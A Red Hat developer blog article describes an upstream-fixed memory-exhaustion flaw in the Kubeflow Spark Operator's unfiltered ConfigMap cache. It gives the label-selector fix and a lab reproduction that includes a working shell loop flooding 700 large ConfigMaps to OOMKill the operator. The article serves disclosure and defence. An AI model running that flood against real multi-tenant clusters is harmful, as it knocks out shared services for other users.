Skip to main content
Redhat Developers  Logo
  • AI

    Get started with AI

    • Red Hat AI
      Accelerate the development and deployment of enterprise AI solutions.
    • AI learning hub
      Explore learning materials and tools, organized by task.
    • AI interactive demos
      Click through scenarios with Red Hat AI, including training LLMs and more.
    • AI/ML learning paths
      Expand your OpenShift AI knowledge using these learning resources.
    • AI quickstarts
      Focused AI use cases designed for fast deployment on Red Hat AI platforms.
    • No-cost AI training
      Foundational Red Hat AI training.

    Featured resources

    • OpenShift AI learning
    • Open source AI for developers
    • AI product application development
    • Open source-powered AI/ML for hybrid cloud
    • AI and Node.js cheat sheet

    Red Hat AI Factory with NVIDIA

    • Red Hat AI Factory with NVIDIA is a co-engineered, enterprise-grade AI solution for building, deploying, and managing AI at scale across hybrid cloud environments.
    • Explore the solution
  • Learn

    Self-guided

    • Documentation
      Find answers, get step-by-step guidance, and learn how to use Red Hat products.
    • Learning paths
      Explore curated walkthroughs for common development tasks.
    • Guided learning
      Receive custom learning paths powered by our AI assistant.
    • See all learning

    Hands-on

    • Developer Sandbox
      Spin up Red Hat's products and technologies without setup or configuration.
    • Interactive labs
      Learn by doing in these hands-on, browser-based experiences.
    • Interactive demos
      Click through product features in these guided tours.

    Browse by topic

    • AI/ML
    • Automation
    • Java
    • Kubernetes
    • Linux
    • See all topics

    Training & certifications

    • Courses and exams
    • Certifications
    • Skills assessments
    • Red Hat Academy
    • Learning subscription
    • Explore training
  • Build

    Get started

    • Red Hat build of Podman Desktop
      A downloadable, local development hub to experiment with our products and builds.
    • Developer Sandbox
      Spin up Red Hat's products and technologies without setup or configuration.

    Download products

    • Access product downloads to start building and testing right away.
    • Red Hat Enterprise Linux
    • Red Hat AI
    • Red Hat OpenShift
    • Red Hat Ansible Automation Platform
    • See all products

    Featured

    • Red Hat build of OpenJDK
    • Red Hat JBoss Enterprise Application Platform
    • Red Hat OpenShift Dev Spaces
    • Red Hat Developer Toolset

    References

    • E-books
    • Documentation
    • Cheat sheets
    • Architecture center
  • Community

    Get involved

    • Events
    • Live AI events
    • Red Hat Summit
    • Red Hat Accelerators
    • Community discussions

    Follow along

    • Articles & blogs
    • Developer newsletter
    • Videos
    • Github

    Get help

    • Customer service
    • Customer support
    • Regional contacts
    • Find a partner

    Join the Red Hat Developer program

    • Download Red Hat products and project builds, access support documentation, learning content, and more.
    • Explore the benefits

Protect your Kubernetes Operator from OOMKill

June 1, 2026
Rishabh Singh Ugo Giordano
Related topics:
KubernetesOperatorsPlatform engineeringSecurity
Related products:
Red Hat OpenShift

    If you've ever worked with Kubernetes, you've probably heard of operators, those helpful programs that watch over your cluster and manage complex applications automatically. They are highly effective. But they have a quiet vulnerability that's easy to miss during code review, and it can let any regular user crash your operator completely. While investigating the Spark Operator, we identified the same pattern in several other controller-runtime operators and worked with upstream maintainers to fix them. Let's walk through it.

    First, what's an informer cache?

    When your operator needs to know about resources in the cluster (like Pods or ConfigMaps), it doesn't query the Kubernetes API every single time. That would be slow and expensive. Instead, it sets up something called an informer.

    The informer performs a full LIST operation of every matching object at startup, then opens a persistent WATCH connection to receive changes in real time. The informer deserializes every object it finds into a full Go struct and stores it in an in-memory cache. Think of it as a live subscriber that keeps a local copy of that data.

    Here's the catch: if you set up an informer without filters, it catches every single object of that type across the entire cluster, as illustrated in Figure 1.

    Informer Cache Concept
    Figure 1: Informer cache mechanism caching all cluster resources indiscriminately when no filters are applied.

    The vulnerability: An unfiltered cache

    In the Kubeflow Spark Operator, the cache was configured like this:

    ByObject: map[client.Object]cache.ByObject{
        &corev1.Pod{}: {
            Label: labels.SelectorFromSet(labels.Set{
                "sparkoperator.k8s.io/launched-by-spark-operator": "true",
            }),
        },
        &corev1.ConfigMap{}: {},  // ← only caches Pods with a specific label
                                   // ← but caches ALL ConfigMaps, everywhere
    }

    The operator protected pods with a label filter, but ConfigMaps were left unfiltered. The empty {} configuration directs the informer to cache all objects.

    How an attacker exploits this

    Here's the scary part: an attacker does not need special permissions to execute this exploit. Any user with the edit ClusterRole—the standard role granted to developers and data scientists in multi-tenant clusters—can create a ConfigMap. That's all it takes to trash your operator.

    The progression of this memory saturation and subsequent pod failure is mapped out in Figure 2.

    OOMKill Attack Flow
    Figure 2: Out-of-memory termination sequence caused by memory growth from unfiltered resource deserialization.

    The math is simple: 700 ConfigMaps at 900 KB each equals approximately 630 MB of raw data. However, the informer does not store raw YAML. Instead, it deserializes each object into a typed Go struct (corev1.ConfigMap) with map headers, string headers, and pointer indirection. The real memory footprint exceeds the raw data size. With a 512 MiB memory limit on the operator, the process terminates. It restarts, attempts to relist everything, crashes again, and enters a CrashLoopBackOff status. Your operator is now completely out of commission, resulting in a denial-of-service condition with no special tools required.

    The solution

    Resolving this memory exhaustion vulnerability requires a systematic engineering approach. Figure 3 outlines the four primary phases of the cache remediation process.

    Fix Steps Overview
    Figure 3: Architectural phases of the step-by-step informer cache remediation sequence.

    Step 1: Filter the cache

    This solution uses the same pattern that the operator already applies to pods. The updated configuration instructs the informer to cache only the objects that contain a specific label.

    // Before (vulnerable) — caches EVERY ConfigMap in the cluster:
    &corev1.ConfigMap{}: {},
    // After (fixed) — only caches ConfigMaps your operator created:
    &corev1.ConfigMap{}: {
        Label: labels.SelectorFromSet(labels.Set{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        }),
    },

    By refining the cache scope, the informer selectively isolates objects in memory, as diagrammed in Figure 4.

    The label filter in action, only operator-owned ConfigMaps enter memory
    Figure 4: The label filter in action, where only operator-owned ConfigMaps enter memory.

    Now when an attacker floods the cluster with unlabeled ConfigMaps, the informer ignores them. These resources never enter your operator's memory footprint.

    Step 2: Label your own ConfigMaps

    The operator creates Prometheus monitoring ConfigMaps for Spark applications. Because the cache now filters by label, those ConfigMaps also require the label; otherwise, your operator cannot detect its own objects.

    return &corev1.ConfigMap{
        ObjectMeta: metav1.ObjectMeta{
            Name:      prometheusConfigMapName,
            Namespace: app.Namespace,
            Labels: map[string]string{
                "sparkoperator.k8s.io/created-by-spark-operator": "true",
            },
        },
        Data: configMapData,
    }

    Step 3: Handle the resource upgrade path

    This scenario is where most engineers encounter issues. When you deploy the patched operator on a cluster that already has ConfigMaps from the old version, those existing objects lack a label. The filtered cache cannot detect these objects. So this awkward thing happens:

    • client.Get() returns NotFound (because the cache cannot detect the unlabeled object).
    • client.Create() returns AlreadyExists because the resource is already present in the API server.

    To bypass this limitation, you can apply a merge patch. A merge patch does not require a resourceVersion field like a standard update operation does, and it applies the label without overwriting other configurations on the object:

    if errors.IsAlreadyExists(createErr) {
        base := &corev1.ConfigMap{ /* just name + namespace */ }
        desired := base.DeepCopy()
        desired.Labels = map[string]string{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        }
        desired.Data = configMap.Data
        return c.Patch(ctx, desired, client.MergeFrom(base))
    }

    This fallback mechanism handles resource reconciliation during deployment transitions without breaking state, as detailed in Figure 5.

    Upgrade-path
    Figure 5: Logical execution flow for evaluating and patching unlabeled pre-existing resources during upgrades.

    Step 4: Propagate labels during resource updates

    For ConfigMaps that are already visible in the cache, ensure the operator writes the label back during an update. This practice guards against edge cases where a label might be missing:

    cm.Data = configMap.Data
    if cm.Labels == nil {
        cm.Labels = map[string]string{}
    }
    cm.Labels["sparkoperator.k8s.io/created-by-spark-operator"] = "true"
    return c.Update(ctx, cm)

    Proving it on a real cluster

    While unit tests are great, observing system behavior directly on a live cluster provides definitive validation. Here's the full walkthrough.

    The test consists of two phases: first, you confirm the vulnerability with the unpatched operator, and then you confirm the fix with the patched operator. The 700 flooded ConfigMaps remain in the cluster between phases, allowing you to test the operator against a realistic worst-case scenario. The sequential verification lifecycle across your environment is mapped in Figure 6.

    OpenShift Cluster Test Flow
    Figure 6: Live validation lifecycle for evaluating operator performance against multi-tenant resource flooding.

    Step 1: Log in to the cluster and verify access

    oc login <your-cluster-url> --username cluster-admin --password <password>
    oc whoami

    You need cluster-admin privileges to deploy the operator and create namespaces. If oc whoami returns your username, the authentication is successful.

    Step 2: Deploy the unpatched operator

    Deploy the stock operator image (quay.io/opendatahub/spark-operator:v2.4.0) using Kustomize manifests. This is the vulnerable version with no label filter on the ConfigMap cache.

    oc apply -k config/default/ --server-side=true
    oc get pods -n spark-operator -w

    The --server-side=true flag avoids field ownership conflicts with large custom resource definitions. Wait until the pod shows Running before proceeding.

    Step 3: Record the operator's baseline memory usage

    Before flooding the cluster, capture the operator's normal memory usage to establish a healthy baseline.

    oc adm top pod -n spark-operator
    NAME                                        CPU(cores)   MEMORY(bytes)
    spark-operator-controller-bb745cb-qj6vj     1m           36Mi

    Note the approximately 36 MiB value. That's your healthy reference point.

    Step 4: Create 10 test namespaces

    for i in $(seq 1 10); do oc create ns oom-test-$i; done

    Spreading ConfigMaps across multiple namespaces simulates a real multi-tenant cluster where different teams create their own resources.

    This loop executes the oc create ns oom-test-1 through oc create ns oom-test-10 commands.

    Step 5: Generate the text-based attack payload

    dd if=/dev/urandom bs=1024 count=900 2>/dev/null | base64 > /tmp/payload.txt
    truncate -s 921600 /tmp/payload.txt
    ls -lh /tmp/payload.txt

    What's happening here: The dd utility reads 900 KB of random bytes from the system, base64 converts the data into plaintext because ConfigMaps cannot store raw binary data, and truncate trims the file to exactly 900 KB because base64 encoding inflates the file size by approximately 33%.

    Step 6: Flood 700 ConfigMaps

    for i in $(seq 1 700); do
      ns="oom-test-$(( (i % 10) + 1 ))"
      oc create configmap "oom-payload-$i" --from-file=data=/tmp/payload.txt -n "$ns" 2>/dev/null &
      [ $((i % 5)) -eq 0 ] && wait
    done
    wait

    The modulo operation (% 10) distributes the ConfigMaps evenly across the 10 namespaces. The & operator runs each creation command in the background to increase execution speed, and the wait command every five iterations prevents the process from overwhelming the API server. Verify that the creation succeeded:

    oc get configmaps -A | grep oom-payload | wc -l
    # Expected: 700

    Step 7: Watch the operator termination

    oc get pods -n spark-operator -w

    Within 30 to 60 seconds, the terminal displays the following status changes:

    spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          5   16h
    spark-operator-controller-bb745cb-qj6vj   0/1   CrashLoopBackOff   5   16h
    spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          6   16h

    Confirm the error state by running the following command:

    oc describe pod -n spark-operator -l app.kubernetes.io/component=controller | grep -A3 "Last State"
    Last State:  Terminated
    Reason:    OOMKilled
    Exit Code: 137

    Vulnerability confirmed. The unfiltered informer cached 630 MB of data and exceeded the 512 MiB memory limit, which caused Kubernetes to terminate the process.

    Step 8: Build and deploy the patched operator image

    Clone the upstream fix branch, build your own image, and deploy it. The 700 flooded ConfigMaps are still sitting in the cluster. The patched operator must withstand this traffic.

    # Build from the upstream fix branch (kubeflow/spark-operator#2878)
    git clone https://github.com/kubeflow/spark-operator.git
    cd spark-operator && git checkout <fix-branch>
    docker buildx build --platform linux/amd64 -t <your-registry>/spark-operator-controller:oom-fix --push .

    The --platform linux/amd64 flag is required if you are building the image on Apple Silicon hardware; without it, the container image will not run on an x86 cluster. After pushing the image, update the running deployment:

    export IMAGE=<your-registry>/spark-operator-controller:oom-fix
    oc set image deployment/spark-operator-controller controller=$IMAGE -n spark-operator
    oc rollout status deployment/spark-operator-controller -n spark-operator

    Replace <your-registry> with your own container registry (for example, quay.io/your-username) and <fix-branch> with the branch name from the upstream pull request. The oc rollout status command blocks until the new pod is fully operational, indicating exactly when it is ready for testing.

    Step 9: Verify the fix holds

    oc get pods -n spark-operator
    NAME                                        READY   STATUS    RESTARTS   AGE
    spark-operator-controller-cdb487b68-sdfnn   1/1     Running   0          71s
    oc adm top pod -n spark-operator
    NAME                                        CPU(cores)   MEMORY(bytes)
    spark-operator-controller-cdb487b68-sdfnn   1m           14Mi

    A memory usage of 14 MiB matches the baseline, resulting in zero restarts. The label filter is doing its job. All 700 unlabeled ConfigMaps remain invisible to the informer cache.

    MetricUnpatchedPatched
    StatusOOMKilled → CrashLoopBackOffRunning, 0 restarts
    MemoryExceeded 512 MiB (exit code 137)14 MiB, flat
    700 flooded ConfigMapsAll cachedIgnored

    Step 10: Cleanup

    for i in $(seq 1 10); do oc delete ns oom-test-$i --wait=false; done
    oc delete -k config/default/
    rm -f /tmp/payload.txt

    The --wait=false flag kicks off namespace deletion in the background without blocking your terminal.

    Common issues and troubleshooting

    Use the following troubleshooting steps to resolve configuration and environment issues encountered during deployment.

    SCC errors on pod startup

    OpenShift's Security Context Constraints are stricter than vanilla Kubernetes. If pods fail to start due to an SCC validation error, grant the privileged SCC to the operator's service accounts:

    oc adm policy add-scc-to-user privileged -z spark-operator-controller -n spark-operator
    oc adm policy add-scc-to-user privileged -z spark-operator-webhook -n spark-operator

    Architecture mismatch (Apple Silicon)

    If you build the image on an M1 or M2 Mac and the target cluster utilizes an x86 architecture, the deployment returns a no image found for architecture "amd64" error. To resolve this issue, rebuild the image using the following command:

    docker buildx build --platform linux/amd64 -t $IMAGE --push .

    Image pull errors from quay.io

    New quay.io repositories are private by default. Navigate to your repository's Settings page and select Make Public before the cluster attempts to pull the image.

    Operator does not terminate with an OOMKilled error

    If the operator is scoped to specific namespaces using the --namespaces flag in the deployment, it will not watch the oom-test-* namespaces and will not cache the flooded ConfigMaps. Check the deployment arguments: An empty --namespaces= flag indicates a cluster-wide scope, which this test requires.

    Tips and best practices

    Implement the following design patterns and testing strategies to safeguard your operators from cache-based memory exhaustion.

    • Always use label selectors on informer caches. If your operator creates ConfigMaps, Services, or other common objects, add a label and filter the cache by that label.
    • Audit all entries in ByObject. Any entry with {}, which indicates an empty configuration, represents an unfiltered cluster-wide informer. Ask: Does this operator require a cache for every object of this type?
    • Use a merge patch for resource upgrade paths. When you add label filtering to an existing deployment, pre-existing objects will not contain the label. Use client.Patch with MergeFrom to add labels without requiring a resourceVersion field.
    • Test with realistic data volumes. The attack requires only approximately 700 ConfigMaps at 900 KB each—well within what a standard user can create. Test your deployments at this scale.

    Wrap up

    An unfiltered informer cache in a controller-runtime operator introduces a vulnerability to out-of-memory (OOM) terminations via ConfigMap flooding. Mitigating this risk involves the following steps:

    1. Add a label selector to the ByObject cache configuration.
    2. Label operator-created ConfigMaps.
    3. Manage the resource upgrade path using a merge patch for pre-existing objects.
    4. Propagate labels during resource updates.

    This vulnerability is not a theoretical problem. After resolving the issue in the Spark Operator, we audited other controller-runtime operators and discovered the same pattern. The upstream fix landed at kubeflow/spark-operator/pull/2878. This configuration pattern is systemic across the controller-runtime ecosystem because ByObject defaults to caching all objects when no selector is specified. The vulnerability applies to any high-volume resource type, including ConfigMaps, secrets, services, and pods. If you maintain a controller-runtime operator, audit your cache configuration to protect your cluster.

    Learn more

    Explore the following resources for more details on cache configuration, upstream fixes, and platform security:

    • Kubeflow Spark Operator: The upstream project
    • kubeflow/spark-operator#2878: The upstream fix for the ConfigMap cache vulnerability.
    • controller-runtime Cache Options: Official documentation for cache configuration.
    • Kubernetes Informers: Documentation explaining the watch and cache mechanism.
    • OpenShift Security Context Constraints: Understanding SCC on OpenShift.

    Related Posts

    • The developer's guide to Kubernetes Operators

    • Evaluate OpenShift cluster health with the cluster observability operator

    • How to run Slurm workloads on OpenShift with Slinky operator

    • Troubleshooting "no healthy upstream" errors in Istio service mesh

    • Kubernetes Operators 101, Part 2: How operators work

    • Build a Kubernetes Operator in six steps

    Recent Posts

    • Protect your Kubernetes Operator from OOMKill

    • Owning the system clock: Good enough?

    • What's new in OpenShift Container Platform system management

    • Claude as your performance analysis partner

    • LogAn: Large-scale log analysis with small language models

    What’s up next?

    Kubernetes Operators ebook tile card

    Kubernetes Operators

    Jason Dobies and Joshua Wood
    Red Hat Developers logo LinkedIn YouTube Twitter Facebook

    Platforms

    • Red Hat AI
    • Red Hat Enterprise Linux
    • Red Hat OpenShift
    • Red Hat Ansible Automation Platform
    • See all products

    Build

    • Developer Sandbox
    • Developer tools
    • Interactive tutorials
    • API catalog

    Quicklinks

    • Learning resources
    • E-books
    • Cheat sheets
    • Blog
    • Events
    • Newsletter

    Communicate

    • About us
    • Contact sales
    • Find a partner
    • Report a website issue
    • Site status dashboard
    • Report a security problem

    RED HAT DEVELOPER

    Build here. Go anywhere.

    We serve the builders. The problem solvers who create careers with code.

    Join us if you’re a developer, software engineer, web designer, front-end designer, UX designer, computer scientist, architect, tester, product manager, project manager or team lead.

    Sign me up

    Red Hat legal and privacy links

    • About Red Hat
    • Jobs
    • Events
    • Locations
    • Contact Red Hat
    • Red Hat Blog
    • Inclusion at Red Hat
    • Cool Stuff Store
    • Red Hat Summit
    © 2026 Red Hat

    Red Hat legal and privacy links

    • Privacy statement
    • Terms of use
    • All policies and guidelines
    • Digital accessibility

    Chat Support

    Please log in with your Red Hat account to access chat support.